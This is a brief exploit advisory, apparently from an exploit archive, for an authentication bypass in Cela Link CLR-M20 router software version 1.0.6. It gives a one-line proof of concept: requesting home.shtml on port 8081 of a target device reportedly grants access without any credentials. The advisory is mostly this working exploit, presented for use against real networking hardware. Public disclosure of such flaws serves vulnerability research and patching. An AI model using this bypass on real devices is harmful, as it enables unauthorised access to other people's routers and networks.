Cela Link CLR-M20 version 1.0.6 suffers from an authentication bypass vulnerability.
88f768b541cbc0b7f8421c301b4d05bb
# Exploit Title: Cela Link CLR-M20 sw version 1.0.6 - Authentication Bypass
# Date: 2018-12-27
# Exploit Author: Mr Winst0n
# Software Link: http://www.celalink.com
# Version: 1.0.6
# Authentication Required: No
# Tested on: Linux
# This vulnerability allows attackers to login without enter any information
# PoC:
# You should only add "home.shtml" to main link address
http://target_ip:8081/home.shtml